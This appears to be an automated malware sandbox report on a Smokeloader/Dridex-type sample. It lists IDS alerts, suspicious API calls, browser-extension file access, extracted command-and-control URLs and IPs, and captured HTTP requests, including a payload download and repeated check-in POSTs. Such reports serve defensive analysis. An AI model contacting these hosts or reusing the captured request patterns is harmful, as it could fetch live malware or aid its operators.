    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF25A4 CryptBinaryToStringA,CryptBinaryToStringA,19_2_02EF25A4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02EF2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,19_2_02EF2799
    Source: ctMI3TYXpX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49915 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49935 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49942 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49951 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49959 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49965 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49971 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49977 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49983 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49995 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50008 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50015 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50024 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50030 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50036 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50043 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50055 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50060 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50061 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6FB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF6F2D6FB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02752B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_02752B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_02753ED9
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02751D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_02751D4A
    Source: C:\Windows\explorer.exeCode function: 15_2_00CD30A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00CD30A8
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49803 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49841 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49822 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49812 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49795 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49831 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50056 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50057 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50059 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50058 -> 180.75.11.133:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 201.103.8.135:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 201.103.8.135:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50064 -> 201.103.8.135:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50068 -> 201.103.8.135:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49915 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49915 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49951 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49942 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49951 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49935 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49959 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49959 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49965 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49935 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49965 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49977 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49971 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49977 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49942 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49989 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49971 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50001 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49989 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50001 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50024 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50024 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50030 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50030 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50008 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49983 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50055 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49983 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50065 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49924 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49924 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50008 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50061 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50067 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50036 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50067 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50036 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50063 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50063 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49995 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49995 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50015 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50015 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50043 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50060 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50060 -> 23.145.40.168:443
    Source: Network trafficSuricata IDS: 2019082 - Severity 1 - ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.4:50069 -> 23.145.40.113:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 201.103.8.135 80Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.168 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 180.75.11.133 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
    Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
    Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
    Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox ViewASN Name: WEBE-MY-AS-APWEBEDIGITALSDNBHDMY WEBE-MY-AS-APWEBEDIGITALSDNBHDMY
    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.4:49915
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://emovkvrsbdl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qlmbybhxbuhwwks.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://dkjcfovkypdsnjsq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ifvxyamcogdoh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jhsgrosrfeyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://snwbetxwxfjxjjcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://duxssctxidfvcwn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://onmervjnyngctx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://gapeuqmkxloigpbr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://toeqqmleovvia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bqjkmpxvvpbja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jesubehqcutadrf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://morbrftngjk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://shalkugnmyu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ubaoujicoyurcry.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://oriixfynfaeoogt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hqstyqadnnvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hlglmlpnwcq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xuoelobbpmbhamy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ninjahallnews.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qotplnnnyldonj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cubjgioqceo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jcipjgavjhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qdnfexfeugqvww.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
